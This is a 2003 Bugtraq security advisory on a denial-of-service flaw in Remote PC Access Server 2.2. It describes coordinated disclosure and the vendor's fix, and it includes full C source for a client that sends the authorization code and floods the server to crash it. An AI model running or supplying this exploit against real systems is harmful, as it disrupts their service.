Dear Bugtraq Here is a full details information about the vulnerability of Remote PC Access Server 2.2, taken from our advisory (includes the exploit code): http://www.ytech.co.il/advisories/rpca/rpcaccess.htm Best Regards, Yaron Tal YTECH.CO.IL ----------------------------------------------------- Remote PC Access Server 2.2 DoS Attack Vulnerability ----------------------------------------------------- Release Date : 26\05\03 Application : Remote PC Access Server 2.2 Platforms : Windows 95/98/ME/NT/2000/XP Vendor : Remote Access Software Author : Yaron Tal (yarontal@ytech.co.il) --------- Overview: --------- Remote PC Access is fast, compact software for accessing and controlling any computer from any computer on the Internet or on local area networks (LAN). View the remote PC's screen and control its keyboard and mouse just as if you were sitting in front of it. The software transparently works through firewalls and routers, and has support for dynamic IP addresses. There is also an option to connect to a remote computer by its nickname instead of its IP address. (from download.com) ---------------------- Vulnerability Details: ---------------------- How the vulnerability can be exploited? Remote PC Access Server using authorization code, in order to verify if Remote PC Access Client has been connected to the local server. The authorization code is 12 bytes long filled with the next bytes order: Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes The attacker can build a spoofed client program and use DoS attack, in order to crash the remote server or remote system. If a local client sends authorization code to remote server, the remote server sends acknowledgment code back to the local client, after this process, by sending received packets from the remote server, the local client overflows the remote server. Solution I notified Remote Access Software about this vulnerability on 21\04\2003 and worked with them to fix the vulnerability. they now released a new version of Remote PC Access Server 3.1 with a fix to this vulnerability. [Download Here] Vendor Responded "Your report suggests that the server part of our software can be crashed by abusing the communication protocol employed between client and server (namely DoS attack). We are aware of this problem and it affects only a few places inside the source code. We are releasing a new version in a week or two which doesn't have this security vulnerability." (Sergey Stoma) ------------------------------------------------- Remote PC Access Server 2.2 - Vulnerability Check ------------------------------------------------- /*************************************************************************** ---------------------------------------------------------------------------- Remote PC Server Version 2.2 - Vulnerability Check (Source Version) Copyright (c) 2003 Yaron Tal. All Rights Reserved. ---------------------------------------------------------------------------- ** Overview **************************************************************** Remote PC Access Server using authorization code, in order to verify if Remote PC Access Client has been connected to the local server. The authorization code is 12 bytes long filled with the next bytes order: Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes The attacker can build a spoofed client program and use DoS attack, in order to crash the remote server or remote system. If a local client sends authorization code to remote server, the remote server sends acknowledgment code back to the local client, after this process, by sending received packets from the remote server, the local client overflows the remote server. ** Terms OF Services ******************************************************* You may not use, copy, modify, decompile, disassemble, emulate, clone rent, lease, sell otherwise reverse engineer, or transfer this program or any subset of this program, any such unauthorized use shall result immediate and automatic termination of this license and may result in criminal and/or civil prosecution. Yaron Tal is not responsible for any special, incidental, indirect or consequential damages that may happen when you use this program. This program can crash remote server or system. *************************************************************************** - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il - Copyright (C) 2003 Yaron Tal. All Rights Reserved. ***************************************************************************/ #include <stdio.h> #include <conio.h> #include <string.h> #include <winsock.h> #define WVERSION MAKEWORD(2,2) void main(int argc, char *argv[]) { SOCKET wSocket; WSADATA wsaData; SOCKADDR_IN wAddress; char Ch = 0, Msg[256]; unsigned char Packet[] = "\x27\x00\x00\x00" // "\x04\x00\x00\x00" // Authorization Code "\x00\x00\x00"; // printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source Version)\n"); printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n"); printf("Usage: <%s> <Remote IP Address>\n",argv[0]); if (argc < 2) exit(1); if (WSAStartup(WVERSION, &wsaData)) { printf("- Error: WSAStartup.\n (%d)", GetLastError()); exit(1); } memset(&wAddress, 0, sizeof(wAddress)); wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); wAddress.sin_family = AF_INET; wAddress.sin_addr.s_addr = inet_addr(argv[1]); wAddress.sin_port = htons(34012); if (wSocket == INVALID_SOCKET) { printf("Error: socket() (%d)\n", GetLastError()); exit(1); } if (connect(wSocket,(LPSOCKADDR)&wAddress,sizeof(struct sockaddr)) == SOCKET_ERROR) { printf("Error: listen() (%d)\n", GetLastError()); exit(1); } printf("Connected To Remote Host...\n"); printf("Sending Data...\n\n"); if (send(wSocket, Packet, sizeof(Packet),0) == SOCKET_ERROR) { printf("- Error: send() (%d)\n", GetLastError()); exit(1); } printf("Press ESC to disconnect and exit program."); while (Ch !=27) { if (kbhit()) Ch = getch(); memset(Msg, 0, sizeof(Msg)); if (recv(wSocket, Msg, strlen(Msg),0) == SOCKET_ERROR) { printf("Error: recv() (%d)\n", GetLastError()); exit(1); } if (send(wSocket, Msg, sizeof(Msg),0) == SOCKET_ERROR) { printf("- Error: send() (%d)\n", GetLastError()); exit(1); } } closesocket(wSocket); WSACleanup(); } ------------------------------ Terms OF Services & Copyrights ------------------------------ Disclaimer: All the information that available in this advisory is Copyright © 2003 Yaron Tal, Yaron Tal is not responsible for any special, incidental, indirect or consequential damages that may happen when you use any of the information in this advisory. About YTECH.CO.IL, In these days, when information security stands in the first priority of many computer users. you can't allow your privacy to be vulnerable. We are creative and dynamic company which provides security software for home\business use, security information consulting, advisories and web site building services. For more information about ytech.co.il you may visit http://www.ytech.co.il or contact us via email: contactus@ytech.co.il. Copyright © 2003 Yaron Tal. All Rights Reserved Worldwide.